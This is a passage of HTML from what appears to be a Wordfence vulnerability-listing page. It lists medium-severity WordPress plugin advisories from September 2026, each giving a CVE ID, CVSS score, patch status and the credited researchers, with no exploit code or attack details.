<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbfd334c-dba4-49ec-b854-59e52236fe57" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed2becc0-7c3d-411f-b5dc-213527ba495b" target="_blank" rel="noopener">Rede Itaú for WooCommerce &lt;= 5.4.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92430" target="_blank" rel="noopener noreferrer">							CVE-2026-92430						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-rede" target="_blank" rel="noopener">Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit</a> <span class="wfvr-software-slug">[woo-rede]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed2becc0-7c3d-411f-b5dc-213527ba495b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9daa4874-da77-43f2-8efa-70753cced5b3" target="_blank" rel="noopener">RestroPress &lt;= 3.4.5 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85010" target="_blank" rel="noopener noreferrer">							CVE-2026-85010						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress" target="_blank" rel="noopener">RestroPress – Online Food Ordering System</a> <span class="wfvr-software-slug">[restropress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9daa4874-da77-43f2-8efa-70753cced5b3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86508e90-07aa-4026-8590-83ccb098c109" target="_blank" rel="noopener">RestroPress &lt;= 3.4.7 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85009" target="_blank" rel="noopener noreferrer">							CVE-2026-85009						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress" target="_blank" rel="noopener">RestroPress – Online Food Ordering System</a> <span class="wfvr-software-slug">[restropress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86508e90-07aa-4026-8590-83ccb098c109" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/314d172d-349f-4a2b-ab57-caf73e5c508f" target="_blank" rel="noopener">Robokassa payment gateway for Woocommerce &lt;= 1.8.8 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91017" target="_blank" rel="noopener noreferrer">							CVE-2026-91017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/robokassa" target="_blank" rel="noopener">Robokassa payment gateway for Woocommerce</a> <span class="wfvr-software-slug">[robokassa]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/314d172d-349f-4a2b-ab57-caf73e5c508f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/29e81910-1bb2-4102-8542-520dcaffe208" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution &lt; 1.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87891" target="_blank" rel="noopener noreferrer">							CVE-2026-87891						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution</a> <span class="wfvr-software-slug">[rox-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/29e81910-1bb2-4102-8542-520dcaffe208" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d83a76a-2d23-4c68-9642-03b66e2208b0" target="_blank" rel="noopener">Rox Appointment Booking &lt;= 1.2.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87896" target="_blank" rel="noopener noreferrer">							CVE-2026-87896						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution</a> <span class="wfvr-software-slug">[rox-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d83a76a-2d23-4c68-9642-03b66e2208b0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33807090-ea59-4379-88ec-5e3f694bc930" target="_blank" rel="noopener">Rox Appointment Booking &lt;= 1.2.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87907" target="_blank" rel="noopener noreferrer">							CVE-2026-87907						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution</a> <span class="wfvr-software-slug">[rox-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33807090-ea59-4379-88ec-5e3f694bc930" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19ce52b7-15b5-4a23-bf0f-2517443b8242" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.65 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82124" target="_blank" rel="noopener noreferrer">							CVE-2026-82124						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/schema-and-structured-data-for-wp" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP</a> <span class="wfvr-software-slug">[schema-and-structured-data-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19ce52b7-15b5-4a23-bf0f-2517443b8242" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c58aa3a-b6ba-4e3c-8d4f-1c27ba518b1a" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.65 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82125" target="_blank" rel="noopener noreferrer">							CVE-2026-82125						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/schema-and-structured-data-for-wp" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP</a> <span class="wfvr-software-slug">[schema-and-structured-data-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c58aa3a-b6ba-4e3c-8d4f-1c27ba518b1a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/542c08f8-a278-4d1c-a6c3-9533bd3a0f6c" target="_blank" rel="noopener">Secure Custom Fields &lt;= 6.9.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92403" target="_blank" rel="noopener noreferrer">							CVE-2026-92403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/secure-custom-fields" target="_blank" rel="noopener">Secure Custom Fields</a> <span class="wfvr-software-slug">[secure-custom-fields]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/542c08f8-a278-4d1c-a6c3-9533bd3a0f6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23ceca79-03f0-4ed8-a02f-c3502f8dd968" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87854" target="_blank" rel="noopener noreferrer">							CVE-2026-87854						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23ceca79-03f0-4ed8-a02f-c3502f8dd968" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/31233f4e-4cd5-497f-9e8a-c65635596241" target="_blank" rel="noopener">TikTok &lt;= 1.4.1 &#8211; Missing Authorization to Unauthenticated TikTok Integration Takeover via &#8216;auth_code&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18346" target="_blank" rel="noopener noreferrer">							CVE-2026-18346						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tiktok-for-business" target="_blank" rel="noopener">TikTok</a> <span class="wfvr-software-slug">[tiktok-for-business]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hillary-mutai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/25c43c189f7a76c6c014a90b5e4c7de2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="25c43c189f7a76c6c014a90b5e4c7de2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hillary-mutai" target="_blank" rel="noopener">Hillary Mutai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/31233f4e-4cd5-497f-9e8a-c65635596241" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54a19a37-77c4-4589-8924-3a67bfc254d2" target="_blank" rel="noopener">TikTok 1.2.0 &#8211; 1.4.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92965" target="_blank" rel="noopener noreferrer">							CVE-2026-92965						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tiktok-for-business" target="_blank" rel="noopener">TikTok</a> <span class="wfvr-software-slug">[tiktok-for-business]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54a19a37-77c4-4589-8924-3a67bfc254d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3555d06b-e36a-4ba5-b026-1c957c63f36b" target="_blank" rel="noopener">To Do List Member &lt;= 1.6 &#8211; Unauthenticated Content Injection</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
